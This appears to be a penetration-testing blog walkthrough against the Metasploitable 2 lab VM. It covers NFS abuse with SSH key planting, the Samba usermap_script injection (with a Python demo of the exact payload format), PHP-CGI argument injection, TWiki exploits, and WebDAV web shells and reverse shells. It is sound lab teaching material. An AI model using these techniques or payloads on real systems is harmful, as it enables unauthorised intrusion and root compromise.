NFS service listening on port 2049, so use the <b><em>showmount</em></b> command to show which file systems are exported by this NFS server.<p><a href="https://drive.google.com/uc?id=1Lj827JYnX__wiUgmaMjcAYkL0gDYlMPd" target="_blank"><img width="419" height="131" title="Checking what file systems are mountable on NFS" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Checking what file systems are mountable on NFS" src="https://drive.google.com/uc?id=1dkF07X_B-n4sjwV9tnzaxXKTFqAXCcQo" border="0"></a><p>Yes! The entire filesystem is mountable/writable! To mount the network filesystem, you need to run the RPC service <b><em>rpcbind</em></b>. 
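<p>What showmount revealed above (the root of the filesystem exported, and writable, to any client) is decided on the server side in <code>/etc/exports</code>, and that file is where a defender would catch it before anyone runs showmount. Below is an added example, not code from the original post, that parses an exports file and reports those conditions. The sample file is constructed: the post shows showmount output but never quotes the Metasploitable 2 exports file, so its exact options are an assumption; the <code>no_root_squash</code> check is included because that option is what lets a remote root write into the exported <code>/root/.ssh</code>.</p>

```python
"""Audit /etc/exports for over-broad NFS exports.

Added example, not code from the original post. The sample content is
constructed; the post does not quote the server's real /etc/exports.
"""
import re
from typing import List, Tuple

# Constructed sample. Line 2 mirrors the Metasploitable-style finding
# (assumed options); lines 3 and 4 show what reasonable exports look like.
SAMPLE_EXPORTS = """\
# /etc/exports: the access control list for filesystems which may be exported
/            *(rw,sync,no_root_squash,no_subtree_check)
/srv/public  192.168.56.0/24(ro,sync,root_squash)
/home        10.0.0.0/8(rw,sync)   # root_squash is the default when not stated
"""

# client token: optional host/netgroup/wildcard, then optional (opt,opt,...)
CLIENT_SPEC = re.compile(r"^([^(]*)(?:\((.*)\))?$")


def parse_exports(text: str) -> List[Tuple[str, List[Tuple[str, List[str]]]]]:
    """Return [(path, [(client, [options...]), ...]), ...] for each export line.

    Comments ('#' to end of line) and blank lines are skipped. A client token
    'host(opts)' splits into host and options; a bare '(opts)' with no host
    means 'every host' and is recorded as ''.
    """
    exports = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        path, *clients = line.split()
        parsed = []
        for token in clients:
            m = CLIENT_SPEC.match(token)
            if not m:  # malformed token: keep it visible as a host with no options
                parsed.append((token, []))
                continue
            opts = [o.strip() for o in m.group(2).split(",")] if m.group(2) else []
            parsed.append((m.group(1), opts))
        exports.append((path, parsed))
    return exports


def audit_exports(text: str) -> List[str]:
    """Return one finding per risky condition, prefixed with 'path -> client'."""
    findings = []
    for path, clients in parse_exports(text):
        for host, opts in clients:
            where = f"{path} -> {host or '*'}"
            world = host in ("", "*") or host.startswith("*")
            if path == "/":
                findings.append(f"{where}: the entire filesystem is exported")
            if world:
                findings.append(f"{where}: exported to every host, no client restriction")
            if world and "rw" in opts:
                findings.append(f"{where}: writable by every host")
            if "no_root_squash" in opts:
                findings.append(f"{where}: no_root_squash, so a remote root keeps uid 0 "
                                "and can write files such as /root/.ssh/authorized_keys")
            if "insecure" in opts:
                findings.append(f"{where}: insecure, requests from unprivileged ports accepted")
    return findings


if __name__ == "__main__":
    for finding in audit_exports(SAMPLE_EXPORTS):
        print(finding)
```

<p>Note that <code>root_squash</code> is the NFS default, so its absence from an export line is not itself a finding; only an explicit <code>no_root_squash</code> is reported.</p>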
Start the service, create a temporary directory to act as a mount point, and then mount the filesystem from the target IP address, with no credentials.<p><a href="https://drive.google.com/uc?id=1CxA8qzKcdvKTOWqs05mIRJiRpo9YXduJ" target="_blank"><img width="521" height="222" title="Mounting the remote file system" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Mounting the remote file system" src="https://drive.google.com/uc?id=1UvWR0KRZi2O9GA9zNTfPAsg6BNzhzlHl" border="0"></a><h3>Abusing NFS to escalate privileges</h3><p>Now you can abuse your write access to the filesystem. You can also download anything you want from the remote machine, like the shadow file, to crack the passwords with John the Ripper.<p>Or you can try a different form of privilege escalation by copying an SSH key into the remote machine's trusted SSH keys and obtaining passwordless remote access. In this method, you will create an SSH key without a passphrase and install it as a trusted key for the victim machine's root user.<p>You start by using <b><em>ssh-keygen</em></b> to generate an RSA keypair without a passphrase:<p><a href="https://drive.google.com/uc?id=193h9FIPogph-Sy3YCCeqUKCckfqm84Od" target="_blank"><img width="663" height="339" title="Generating an RSA keypair without a passphrase" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Generating an RSA keypair without a passphrase" src="https://drive.google.com/uc?id=1m0VPA3nBQimb4Hu1EWBhAlb2TZJnv-aM" border="0"></a><p>Now place that key in the <strong><em>/root/.ssh</em></strong> folder of the mounted filesystem, where SSH looks for trusted keys by default.<p><a href="https://drive.google.com/uc?id=1Yhq8B4V2Xz3PHzODUZPZ_ai9MU_tNN6s" target="_blank"><img width="712" height="70" title="Placing the RSA key" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Placing the RSA key" src="https://drive.google.com/uc?id=1Q3XG1IU4FqRL-eTSMVXKHY36nccJcWzX" border="0"></a><p>Don’t forget to unmount the remote file system:<p><a href="https://drive.google.com/uc?id=1Ew2kcwPjqqoOa9BItmhfLpeOYgEkQ_Mc" target="_blank"><img width="290" height="71" title="Unmounting the remote file system" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Unmounting the remote file system" src="https://drive.google.com/uc?id=1PDE-8z0lmYnUzk2BfjIiONYqM0-5OatT" border="0"></a><p>Now you have SSH root access without a password!<p><a href="https://drive.google.com/uc?id=1r1ctMTYtfStWdMMrlqQOXyNX2-Y9Te2p" target="_blank"><img width="817" height="334" title="SSH root access via RSA key" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="SSH root access via RSA key" src="https://drive.google.com/uc?id=1Ppuxo3OSpAbM08GHhl1vSl0hi1C7zcWu" border="0"></a></p><p><strong>Next post</strong>: <a title="Metasploitable 2 Walkthrough: Part VII" href="https://myhackinglessons.blogspot.com/2020/11/metasploitable-2-walkthrough-part-vii.html">Metasploitable 2 Walkthrough: Part VII</a></p>Rui Natáriohttp://www.blogger.com/profile/12067366039242874604noreply@blogger.com0tag:blogger.com,1999:blog-6396309617370994433.post-1499270311849863202020-11-03T15:41:00.000-08:002020-11-21T00:11:40.921-08:00Metasploitable 2 Walkthrough: Part V<h2>Exploiting Port 139 – NetBIOS Session Service, Samba</h2><p>Session mode lets two computers establish a connection, allows messages to span multiple packets, and provides error detection and recovery. Do you remember the exact Samba version that is running on the Metasploitable 2 VM? 
Use Nmap to refresh your memory:<p><a href="https://drive.google.com/uc?id=114nQeM-usqBAqrdJWLqOIrTY2Fm1Dx7K" target="_blank"><img width="846" height="192" title="Scanning port 139 with Nmap" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Scanning port 139 with Nmap" src="https://drive.google.com/uc?id=1BEm9zV3tpNwMysHaE3LwF0hlfkOcK46c" border="0"></a><p>The vulnerability in this service (CVE-2007-2447, Samba 3.0.20 through 3.0.25rc3) lies in Samba's <b><em>username map script</em></b> option. The username supplied during SMB session setup is passed to that script through the shell without any filtering, so an attacker who opens a session with shell metacharacters in the username, for example a command in backticks, gets that command executed on the remote system. It happens before any authentication succeeds, so no valid account is needed, and because smbd runs as root the injected command runs as root too, which is why this gives you a root shell.<p>This is extremely easy: load the Metasploit module <b><em>exploit/multi/samba/usermap_script</em></b>, set RHOSTS, and run it.<p><a href="https://drive.google.com/uc?id=1Vxs-GOP0eQJezThwvFX3yLSuVm7mM21L" target="_blank"><img width="834" height="203" title="Exploiting Samba with MSF" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Exploiting Samba with MSF" src="https://drive.google.com/uc?id=1UNHxFEiLR03-IzqeDabxx2GjTftVWW98" border="0"></a><p><a name="more"></a><p>The default port for this exploit is 139, but it works just as well against port 445.<h2>Exploiting Port 445 – SMB, Samba</h2><p>Confirm the version number with Metasploit:<p><a href="https://drive.google.com/uc?id=1krsEjb7jen8FWEAAdJSO6tQQv0K9P1Kw" target="_blank"><img width="837" height="165" title="Enumerating service at port 445 with MSF" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating service at port 445 with MSF" src="https://drive.google.com/uc?id=1BFKn1g__4dgBRfXHv8utx3ORGZZLZyBb" border="0"></a><p>This version of Samba has several vulnerabilities that can be exploited. The first you will explore is the issue with “wide links” being enabled. 
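<p>Before moving on to wide links, here is the username map script bug in code. This is an added illustration, not part of the original post and not Samba's own code: it reproduces Samba's shell dispatch of the username with a stand-in script (<b><em>echo</em></b>) and a constructed arithmetic probe, side by side with the argv-based dispatch a fixed Samba uses, and shows the exact username string the MSF module sends.</p>

```python
"""Why CVE-2007-2447 (exploit/multi/samba/usermap_script) is a one-liner.

Added example, not code from the post. Samba 3.0.20-3.0.25rc3 hands the
username from SMB session setup to the `username map script` command through
/bin/sh, unescaped. The two functions below reproduce that dispatch with a
stand-in script (`echo`, constructed for the demo): vulnerable_map() splices the
name into `sh -c` the way Samba's smbrun() did, hardened_map() passes it as a
separate argv element, so metacharacters stay inert. No SMB is spoken here; the
point is the injection primitive and the exact username shape the MSF module
sends.
"""
import subprocess

MAP_SCRIPT = "echo"  # stands in for e.g. /etc/samba/scripts/mapusers.sh


def usermap_payload(command: str) -> str:
    """Username the Metasploit module sends: "/=" followed by the command in
    backticks; nohup keeps the spawned shell alive after smbd's child exits."""
    return "/=`nohup " + command + "`"


def vulnerable_map(username: str) -> str:
    """smbrun-style dispatch: script and username become ONE shell command line,
    so backticks, ; and $() in the username are interpreted by /bin/sh."""
    proc = subprocess.run(MAP_SCRIPT + " " + username, shell=True,
                          capture_output=True, text=True)
    return proc.stdout


def hardened_map(username: str) -> str:
    """What a fixed Samba does: the username is an argv element, never parsed
    by a shell, so the script receives the metacharacters as plain bytes."""
    proc = subprocess.run([MAP_SCRIPT, username], shell=False,
                          capture_output=True, text=True)
    return proc.stdout


# The probe asks the shell to evaluate 6*7: "/=42" in the script's output
# proves a shell ran the injected text; the literal "$((6*7))" proves it did not.
PROBE = usermap_payload("echo $((6*7))")


def shell_ran_injected_command(output: str) -> bool:
    return "/=42" in output


if __name__ == "__main__":
    print("vulnerable :", vulnerable_map(PROBE).rstrip())
    print("hardened   :", hardened_map(PROBE).rstrip())
```

Against the real target the same string goes in as the SMB username (that is all the MSF module does, with a reverse shell in place of the arithmetic), and the command runs as root because smbd does.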
Wide links are enabled by default on older versions of Samba. With them on, smbd follows symbolic links that point outside the share, so a symlink you can create inside a writable share lets you read the rest of the filesystem (whatever the share's guest user may read) without ever authenticating through SMB.<h3>Exploiting SMB using smbclient</h3><p>You can use a tool called <em><b>smbclient</b> </em>to connect to the Metasploitable box and list the available shares without a valid username/password. It prompts for a password for your current user (root); just press Enter to send an empty one and the server grants you a null session.<p><a href="https://drive.google.com/uc?id=1GZx-GhhWqx5382SQwCxgMeSwVifwqxfv" target="_blank"><img width="834" height="389" title="Using smbclient to get access" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Using smbclient to get access" src="https://drive.google.com/uc?id=10-qgyNkfr-tpeoVSmPA-KdNUII3I6_70" border="0"></a><p><b>NOTE</b>: In the current Kali version you need to edit <b>/etc/samba/smb.conf</b> before these commands give proper results: the client now defaults to SMB2/SMB3, which this Samba 3.0 server does not speak, so add <b><em>client min protocol = NT1</em></b> to the <b>[global]</b> section to allow the old dialect.<p><a href="https://drive.google.com/uc?id=1YYgmB9vb8EYbvVrOeNTC-W6iIK7Tie6k" target="_blank"><img width="739" height="506" title="Editing Kali's /etc/samba/smb.conf file" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Editing Kali's /etc/samba/smb.conf file" src="https://drive.google.com/uc?id=1po6QWuotYRNSLn3saL3BbiqtrmzDuVd7" border="0"></a><p>You can get even better results from <b><em>smbmap</em></b>, which also shows the permissions you have on each share:<p><a href="https://drive.google.com/uc?id=1U5pQ3I9JwPqOgK7Y6_evo8xsoWLIhMHH" target="_blank"><img width="776" height="145" title="Using smbmap" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Using smbmap" src="https://drive.google.com/uc?id=1mIG4gJWpjFNrBJmGzZWVdFDA5uZpcegW" border="0"></a><p>What really matters is that you have found a share that is writable without credentials, “<b><em>tmp</em></b>”. 
There is an auxiliary module for this in MSF, <b><em>auxiliary/admin/smb/samba_symlink_traversal</em></b>: it connects to the writable share and creates a symlink in it, named <b><em>rootfs</em></b> by default, that points to <b><em>/</em></b>.<p><a href="https://drive.google.com/uc?id=1Ckn5ydK4-NQBf01NO9qHJ3BOWLctpK4Q" target="_blank"><img width="776" height="287" title="Exploiting SMB with MSF" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Exploiting SMB with MSF" src="https://drive.google.com/uc?id=1PWIVNpM3e9hMTsAGIwVXdqJDYo3wzEY7" border="0"></a><p>The module reports success, so connect again using <b><em>smbclient</em></b> and see if you can change into the <em><b>rootfs</b> </em>directory.<p><a href="https://drive.google.com/uc?id=14EJXsmwuubPgIkvoFlGroULj7y9wmeNo" target="_blank"><img width="769" height="269" title="Accessing the rootfs directory" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Accessing the rootfs directory" src="https://drive.google.com/uc?id=1kaP8g0MG4F_1Gi5dJw39rG8vBPhsEcTq" border="0"></a><p>So now you can browse the root filesystem through the share. You could continue enumerating the machine, looking at configuration files and so on, to see if you can find any other holes. 
Please note that you are not reading files as root here: smbd serves the share as its guest account, so some files and directories (<b><em>/etc/shadow</em></b>, for one) will not be accessible.<h2>Exploiting Ports 512, 513, 514: r-Services</h2><p>TCP ports 512 (exec), 513 (login) and 514 (shell) are known as the “<strong><em>r-services</em></strong>”, and on this VM they have been misconfigured to allow remote access from any host: the trust files (<b><em>.rhosts</em></b> / <b><em>hosts.equiv</em></b>) contain a wildcard, so any client that merely claims to be root is logged in as root.<p>These are the historically insecure Berkeley r-commands, developed back in 1982 on an early implementation of the TCP/IP stack, when the only "authentication" anyone thought necessary was that the client came from a trusted host and a privileged source port.<p><a href="https://drive.google.com/uc?id=1ccWRPhJzqKXckUsVotcEu6KOC8_zhE1b" target="_blank"><img width="804" height="221" title="Scanning r-services ports with Nmap" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Scanning r-services ports with Nmap" src="https://drive.google.com/uc?id=1A4Ia8usj3TZH1tRBctdCllf_AwUByEcc" border="0"></a><p>To take advantage of this, make sure the <b><em>rsh-client</em></b> package is installed (on Kali the <b><em>rlogin</em></b> and <b><em>rsh</em></b> commands are otherwise alternatives that point at the SSH client, so you would be talking SSH instead), and run the <b><em>rlogin</em></b> command as your local root user: the server only accepts connections from source ports below 1024, which only root can bind. <p><b>NOTE</b>: Current Kali does not include the <b><em>rsh-client</em></b> tool by default; install it with <b><em>apt-get install rsh-client</em></b>. 
With <b><em>rsh-client</em></b> installed (<b><em>apt-get install rsh-client</em></b>), the three services behave as follows.<h3>Exploiting rexec</h3><p>The <b><em>rexec</em></b> client is no longer packaged for Kali, so this walkthrough leaves port 512 alone. It is a different case anyway: rexecd authenticates with a cleartext username and password rather than <b><em>.rhosts</em></b> trust, so you would need real credentials (the msfadmin account, for instance) instead of a mere claim of identity.<h3>Exploiting rlogin</h3><p>The <b><em>rlogin</em></b> command connects to port 513; because the target trusts any host and you arrive from a privileged port claiming to be root, rlogind gives you a root shell without asking for a password:<p><a href="https://drive.google.com/uc?id=1H-4lfycfUBRD4FIdkZFawEwG44hXiGQB" target="_blank"><img width="786" height="330" title="Root access using rlogin" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Root access using rlogin" src="https://drive.google.com/uc?id=1tqv3M-2ky9jbtK3oOkpsSHwulAIs7m95" border="0"></a><h3>Exploiting rsh</h3><p>The<em> <b>rsh</b></em> command connects to port 514 and runs a single command as root; given no command, it falls back to rlogin and gives you a root shell.<p>If you run rsh (or rlogin) as local root, you don’t need to specify the remote user on the command line: the r-commands default to your local username, so local root asks for remote root:<p><a href="https://drive.google.com/uc?id=1zQZMprP9zIY8ZGXFvS3Xl1trVmO_DblL" target="_blank"><img width="781" height="324" title="Root access using rsh" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Root access using rsh" src="https://drive.google.com/uc?id=1inzYIzFgae5sF16n5SPqzD2b3yOPd-lG" border="0"></a>Rui Natáriohttp://www.blogger.com/profile/12067366039242874604noreply@blogger.com0tag:blogger.com,1999:blog-6396309617370994433.post-29402134728177169722020-11-03T15:08:00.000-08:002020-11-21T00:10:45.226-08:00Metasploitable 2 Walkthrough: Part IV<h2>Exploiting Port 80 – PHP</h2><p>Navigating to the root of the web server, you will see some vulnerable web applications, along with the <strong><em>msfadmin</em></strong> account details which you got earlier with Telnet. 
<p>The Mutillidae and DVWA web applications are outside the scope of this post, which is mostly focused on host-based exploitation. However, you can easily exploit the other web applications to get a shell.<p><a href="https://drive.google.com/uc?id=1TCSeaA2jUMgIgmpnbbzScCJ8IwnWKxNf" target="_blank"><img width="446" height="372" title="Port 80 banner" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Port 80 banner" src="https://drive.google.com/uc?id=1KojiKtMOFODIDQ3cd8-lhI6FW7aNXR_S" border="0"></a><a name="more"></a><h3>Exploiting PHP using Metasploit</h3><p>You know port 80 is open, so you type the IP address of Metasploitable 2 in your browser and notice that it is running PHP. If you dig a little further (the phpinfo page) you will find which version of PHP is running and also that it is being run as a CGI.<p><a href="https://drive.google.com/uc?id=1giQPcT3KviUSYUAUXT6AHreYoCljEc94" target="_blank"><img width="774" height="530" title="PHP information" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="PHP information" src="https://drive.google.com/uc?id=1SBJjGewUiGpfcetO5McmmpPGM3eNjqU4" border="0"></a><p>When running as a CGI, PHP before 5.3.12 and 5.4.x before 5.4.2 are vulnerable to argument injection (CVE-2012-1823): a query string that contains no <b><em>=</em></b> is passed to the php-cgi binary as command-line arguments, so a request such as <b><em>?-d allow_url_include=1 -d auto_prepend_file=php://input</em></b> makes PHP execute whatever you send in the POST body. <p>Search for and use the appropriate MSF module (<b><em>exploit/multi/http/php_cgi_arg_injection</em></b>) to get a shell.<p><a href="https://drive.google.com/uc?id=1ZBPOLHCJwy4ATAT-Cq6zKBkxoGdI0rRq" target="_blank"><img width="775" height="298" title="Exploiting PHP with MSF" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Exploiting PHP with MSF" src="https://drive.google.com/uc?id=1FWbciAKNZZRAtOmXza15uDBWlfImo4HY" border="0"></a><h2>Exploiting Port 80 - TWiki</h2><p>TWiki is a Perl-based structured wiki application, typically used to run a collaboration platform, knowledge or document management system, a knowledge base, or team portal. 
Users can create wiki pages using the TWiki Markup Language, and developers can extend wiki application functionality with plugins.</p><h3>Exploiting TWiki using Metasploit</h3><p>The earlier OpenVAS scan revealed that the TWiki web application is vulnerable to remote code execution. There are two exploits available in MSF for this application, <b><i>twiki_history</i></b> and <b><i>twiki_search</i></b>; both are command injections through an unsanitised parameter that TWiki hands to a shell (the revision parameter of the history view and the search string, respectively).<p><a href="https://drive.google.com/uc?id=1DEcWQDwrEt47JyxvznJ73OUEypY8WC0T" target="_blank"><img width="785" height="149" title="MSF modules for TWiki" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="MSF modules for TWiki" src="https://drive.google.com/uc?id=1kOTD_EvoPf4VB4RrglMe_1_h-cgoGLWJ" border="0"></a><p>Both <b><i>twiki_history</i></b> and <b><i>twiki_search</i></b> are supposed to work flawlessly, but that does not appear to be the case.<p><a href="https://drive.google.com/uc?id=1Wupd6IcIJE-yCWJ8YGGYVMB6Y8B5idR1" target="_blank"><img width="786" height="271" title="Exploiting TWiki with MSF" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Exploiting TWiki with MSF" src="https://drive.google.com/uc?id=1V7oVVI-oRsgWACheghpLUDvnMdFJ2_p7" border="0"></a><p>Confusing, but the session is created.<p>The other one refuses to create a session…<p><a href="https://drive.google.com/uc?id=1NpiQvwnHKhauXzq2ywBxxQtbxSxrdooe" target="_blank"><img width="783" height="353" title="Failed TWiki exploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Failed TWiki exploit" src="https://drive.google.com/uc?id=123zXfUrUwN0JxA3WOGn2BRpkDDLyq0re" border="0"></a><h2>Exploiting Port 80 - WebDAV</h2><p>WebDAV stands for Web Distributed Authoring and Versioning. The WebDAV protocol extends HTTP with methods (PUT, DELETE, PROPFIND, MKCOL and others) that let users create, change and move documents on a server, typically a web server or web share. 
WebDAV is exploitable in many different ways.<h3>Exploiting WebDAV using Davtest</h3><p>You can test DAV using the <b><em>davtest</em></b> command-line utility: it uploads small test files of several types (txt, php, asp, jsp and so on) and then requests each one to see which the server stores and which it executes. To scan a WebDAV server just give it the URL:</p><p><a href="https://drive.google.com/uc?id=1_0iFV-wnqWP4fT1WT_6LYHMmGwBwubFC" target="_blank"><img width="557" height="504" title="Scanning WebDAV with davtest" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Scanning WebDAV with davtest" src="https://drive.google.com/uc?id=1B3FNZJtP9KUQbDXKfc5i4CEd7Ij0yOJi" border="0"></a><p>From the davtest scan, you saw a bunch of actions failed. I guess that means you need credentials to do anything. Or maybe you need a better tool…<h3>Exploiting WebDAV using Cadaver</h3><p>Cadaver is a command-line client for WebDAV servers. With cadaver you can connect to the DAV server directly, and it turns out this does not require credentials: type the <strong><em>cadaver</em></strong> command with the URL and you are connected at once. Once connected you can issue a number of different commands (ls, put, get, delete and so on).<p><a href="https://drive.google.com/uc?id=1-Ncj0uLa6XIB7bbmaIMYXNIu7j-mah9u" target="_blank"><img width="766" height="274" title="Exploiting WebDAV with cadaver" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Exploiting WebDAV with cadaver" src="https://drive.google.com/uc?id=16Yhg7fL19ew0k7MduwK63Z_dL7RfgOxb" border="0"></a><p>What this means is that you have write access to the WebDAV directory, so you can create files there. In particular, you can upload <b><em>web shells</em></b> to the WebDAV server.<p>Web shells are scripts written in a server-side language such as PHP, Python, ASP or Perl that act as a backdoor once uploaded to a web server: each request to the script runs commands or file operations with the web server's privileges, so the attacker can read, edit or delete files on the server from a browser.<p>Kali Linux ships a collection of PHP web shells. They are stored under <b><em>/usr/share/webshells/php</em></b>, so a pentester can use them without spending time writing the PHP code.<p><a href="https://drive.google.com/uc?id=1HEMXfEBLVRXQWykYDqcxayjBUHbtry0b" target="_blank"><img width="685" height="244" title="Listing Kali's web shells " style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Listing Kali's web shells " src="https://drive.google.com/uc?id=115tjSjxn159Bl6b4o7khYnP94SbsKAT1" border="0"></a><p>You can take advantage of these scripts to get a remote shell. You start by uploading the script to the server using cadaver. <p>Upload the <b><em>simple-backdoor</em></b> script (it runs whatever you pass in its <b><em>cmd</em></b> query parameter):<p><a href="https://drive.google.com/uc?id=1XAQs9r9SMgihYgBFGRsOykKhFmPkKHHw" target="_blank"><img width="753" height="120" title="Uploading the simple-backdoor script" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Uploading the simple-backdoor script" src="https://drive.google.com/uc?id=1_8ERX56TLSZ6PVC8aB_LysPgmccAq5Tn" border="0"></a><p>Then you execute the script in the web browser.<p><a href="https://drive.google.com/uc?id=1oOe4tHg-8kzmNoFI8-HGXBT3PWwkJzQJ" target="_blank"><img width="755" height="128" title="Executing the script on the browser" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Executing the script on the browser" src="https://drive.google.com/uc?id=1xhz0jiYoDzz4gHOLfmgAoMmewm84AHk8" border="0"></a><p>The script is now ready to execute commands:<p><a href="https://drive.google.com/uc?id=1URjkS4uTIiXkRtYSOFcjYK1yTRGKsI0I" target="_blank"><img width="751" height="129" title="Executing a simple command" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Executing a simple command" src="https://drive.google.com/uc?id=1qk9Or3XSw04YX052JOb7he11hfFOvIvq" border="0"></a><p><a href="https://drive.google.com/uc?id=1fPFIKO_awsyfR6nvRluNV6rOkDoT2BeM" target="_blank"><img width="752" height="368" title="Dumping the /etc/passwd file" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Dumping the /etc/passwd file" src="https://drive.google.com/uc?id=15DMrPYfTe0q5f01jyP1meFeMa0vs-QiH" border="0"></a><p>Try a different script (<b>php-backdoor</b>):<p><a href="https://drive.google.com/uc?id=1ftZ7OppO2KBXNV6I0271e329Cj9UWXcp" target="_blank"><img width="762" height="86" title="Uploading the php-backdoor script" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Uploading the php-backdoor script" src="https://drive.google.com/uc?id=1nc2xy3vv16MkGa3q-5hJuZXBdY3AdU_3" border="0"></a><p>This script gives you a true web shell to perform a number of tasks:<p><a href="https://drive.google.com/uc?id=1uEzw3GOAKJQ40Pe06f45scdmuAAjsZec" target="_blank"><img width="778" height="395" title="The php-backdoor web shell" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="The php-backdoor web shell" src="https://drive.google.com/uc?id=1OqCgLxNHwx8-hc5Y18Ekk8MYCy9ID-WF" border="0"></a><p>Run a command:<p><a href="https://drive.google.com/uc?id=1pgeUw7oqfhDYJNVg--UWv7Yg-vkLhOwu" target="_blank"><img width="763" height="101" title="Running the ls command in the web shell" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Running the ls command in the web shell" src="https://drive.google.com/uc?id=17rtWpKXEkxnKq_p-aoyrHwSFYlrEyV28" border="0"></a><p><a href="https://drive.google.com/uc?id=1A1PxRQW33uky5rcUDs75pShFn92X_Cnm" target="_blank"><img width="754" height="134" title="Running the ls command in the web shell" style="margin: 0px auto; float: none; display: block; background-image: none;" 
alt="Running the ls command in the web shell" src="https://drive.google.com/uc?id=1a-PCtsrMdu268OLjrn1eXmJTL6WrK1Y6" border="0"></a><p>Try a different script (<b>qsd-php-backdoor</b>):<p><a href="https://drive.google.com/uc?id=1crgWZcNkHNGf9Ov3mP_VV-wUw_v8Sl76" target="_blank"><img width="804" height="87" title="Uploading the qsd-php-backdoor script" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Uploading the qsd-php-backdoor script" src="https://drive.google.com/uc?id=1lu5VHFsHzXObDhvTgLV5c3Az6acpriRh" border="0"></a><p>And you will get an even better web shell:<p><a href="https://drive.google.com/uc?id=1lUrJvOG_vF-C2FRCfs7ci5sQAZyYr9sN" target="_blank"><img width="749" height="625" title="The qsd-php-backdoor script web shell" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="The qsd-php-backdoor script web shell" src="https://drive.google.com/uc?id=1SoeXaMPj2B1UGiXny8k05SKLcMXGys6b" border="0"></a><p>You can also create a reverse shell but for that you need to edit the script in order to adjust the settings to your needs. 
Namely, you will need to insert the IP address of your attacker machine so that the victim knows where to send the shell.<p>Edit the <b><em>php-reverse-shell.php</em></b> file and make the necessary changes:<p><a href="https://drive.google.com/uc?id=12bLUPNDhZDWc8BFlrOEPjJzLExIS4YPt" target="_blank"><img width="782" height="239" title="Editing the php-reverse-shell script" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Editing the php-reverse-shell script" src="https://drive.google.com/uc?id=1LT7fgrrzzc1thVDVjKcmYkfAup4BkYt_" border="0"></a><p>Now put the script on the server with cadaver, start a Netcat listener, and open the script with the web browser as before:<p><a href="https://drive.google.com/uc?id=1MSDl6zqI8cpsf_S4x_FzLrN0JIk9rSUs" target="_blank"><img width="808" height="84" title="Uploading the modified php-reverse-shell script" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Uploading the modified php-reverse-shell script" src="https://drive.google.com/uc?id=1VC0-8rBKxBW9MKzRZhgwnnZ3KvfOADVS" border="0"></a><p><a href="https://drive.google.com/uc?id=1kGT5COMLZ2LL9GikKJ3xrZ03JFAXd7Vs" target="_blank"><img width="390" height="128" title="Starting a Netcat listener" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Starting a Netcat listener" src="https://drive.google.com/uc?id=1xV_AVNCx_36Rio_q9CqeUV7fZizT_MCz" border="0"></a><p><a href="https://drive.google.com/uc?id=1iViphS71FXbR9zHUFqS2jisr9Gg5D2yB" target="_blank"><img width="806" height="136" title="Running the modified php-reverse-shell script" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Running the modified php-reverse-shell script" src="https://drive.google.com/uc?id=1ZaCfMcyY_NysHcRot5V3R64MbI7WyoN7" border="0"></a><p>And you will get a shell:<p><a href="https://drive.google.com/uc?id=10FOZjMN9Mj9bE1mx5GmObHNArmjohosL" target="_blank"><img width="736" 
height="225" title="Netcat shell" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Netcat shell" src="https://drive.google.com/uc?id=12y3r18609Up1ZD-gSUtNPSAM8niwcGd4" border="0"></a><h3>Exploiting WebDAV using Metasploit</h3><p>To check for WebDAV, you can use a couple of different modules:<p><a href="https://drive.google.com/uc?id=1N8PCwiyYDOygJpUJEkfNeUS-dGhUOfSI" target="_blank"><img width="734" height="174" title="Wrong MSF results" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Wrong MSF results" src="https://drive.google.com/uc?id=1OXLlMf2RPe9Zymkpl9bnus69Ve3xyYNH" border="0"></a><p>Wrong results…<p><a href="https://drive.google.com/uc?id=1mDrMCUZArj_8IXPZDb-09nEFAIVMnJK3" target="_blank"><img width="730" height="167" title="Failed MSF module" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Failed MSF module" src="https://drive.google.com/uc?id=1MgxX-GT2nkR40p90Bsodk2RhtyV3kjQN" border="0"></a><p>Also, not very useful…<p><a href="https://drive.google.com/uc?id=1f9ZYqPWS8nVhUoDobsbloh1cx0c6OxAk" target="_blank"><img width="731" height="139" title="Failed MSF module" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Failed MSF module" src="https://drive.google.com/uc?id=1tyMSP-ZxyXSND0RCX30RJuzPfupIhD0B" border="0"></a><p>Nothing…<p>But if you manage to find a writable directory, you 